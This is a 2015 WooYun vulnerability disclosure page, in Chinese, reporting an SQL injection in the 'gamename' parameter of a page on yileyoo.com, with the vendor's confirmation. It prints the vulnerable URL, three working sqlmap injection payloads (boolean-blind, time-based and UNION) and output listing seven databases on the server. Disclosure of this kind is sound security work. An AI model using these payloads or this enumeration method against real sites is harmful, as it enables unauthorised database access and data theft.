当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126918

漏洞标题:易乐游SQL注入(7库)

相关厂商:stnts.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-15 14:40

修复时间:2015-09-02 15:34

公开时间:2015-09-02 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-19: 厂商已经确认,细节仅向厂商公开
2015-07-29: 细节向核心白帽子及相关领域专家公开
2015-08-08: 细节向普通白帽子公开
2015-08-18: 细节向实习白帽子公开
2015-09-02: 细节向公众公开

简要描述:

天地本不仁 万物为刍狗
【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

http://www.yileyoo.com/ey_game_update/adjustGame.html?gamename=
参数 gamename 可注入

0.png


Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.yileyoo.com:80/ey_game_update/adjustGame.html?gamename=i
f(now()=sysdate(),sleep(0),0)/' AND 6677=6677 AND 'OEAh'='OEAh'XOR(if(now()=sysd
ate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.yileyoo.com:80/ey_game_update/adjustGame.html?gamename=i
f(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))uzXN) AND '
Zxbd'='Zxbd'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(
0),0))OR"/
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: http://www.yileyoo.com:80/ey_game_update/adjustGame.html?gamename=i
f(now()=sysdate(),sleep(0),0)/' UNION ALL SELECT CONCAT(0x7170717071,0x697a6d795
275506b4753,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 'XOR(if(now()=sys
date(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[13:20:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[13:20:52] [INFO] fetching database names
[13:20:53] [WARNING] reflective value(s) found and filtering out
available databases [7]:
[*] information_schema
[*] stwk
[*] stwk_bj
[*] stwk_old
[*] stwk_simp
[*] stwk_sz
[*] zygx
[13:20:53] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.yileyoo.com'


看了下权限

1.png


再跑了数据库的表和数量(PS:用户的表一个数据库有好几个我也不知道哪个是管理类的 就没深入了 具体数量我也不知道)

2.png


3.png


4.png


5.png


6.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-19 15:33

厂商回复:

一个早期项目的代码不严格所致。感谢作者(昵称实在太长)提供漏洞。

最新状态:

暂无